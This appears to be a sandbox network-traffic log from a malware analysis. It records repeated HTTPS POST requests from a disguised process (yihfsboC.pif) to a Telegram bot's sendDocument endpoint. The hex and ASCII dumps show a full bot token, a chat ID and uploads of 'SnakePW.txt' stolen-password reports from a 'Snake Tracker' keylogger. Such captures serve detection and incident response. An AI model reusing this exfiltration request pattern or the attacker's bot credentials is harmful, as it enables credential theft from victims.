                                                                                                                2024-11-26 07:25:34 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 33 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388862,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605934,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                13192.168.2.749806149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:34 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dcf5032218b
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:34 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 63 66 35 30 33 32 32 31 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0dcf5032218bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:25:35 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:35 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:35 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 33 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388864,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605935,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                14192.168.2.749810149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:35 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dfed0e58a0d
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:35 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 66 65 64 30 65 35 38 61 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0dfed0e58a0dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:36 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:36 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:36 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 33 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388866,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605936,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                15192.168.2.749811149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:36 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e74ea27430b
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:36 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 37 34 65 61 32 37 34 33 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e74ea27430bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:36 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:36 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:36 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 33 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388868,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605936,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                16192.168.2.749813149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:36 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0de86b2c0ccf
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:36 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 65 38 36 62 32 63 30 63 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0de86b2c0ccfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:25:37 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:37 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:37 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 33 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388870,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605937,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                17192.168.2.749817149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:37 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e1651b783f6
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:37 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 31 36 35 31 62 37 38 33 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e1651b783f6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:38 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:38 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:38 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 33 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388872,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605938,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                18192.168.2.749818149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:38 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e8c046fa382
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:38 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 38 63 30 34 36 66 61 33 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e8c046fa382Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:38 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:38 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:38 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 33 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388874,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605938,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                19192.168.2.749821149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:38 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e000d88a51d
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:38 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 30 30 30 64 38 38 61 35 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e000d88a51dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:25:39 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:39 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
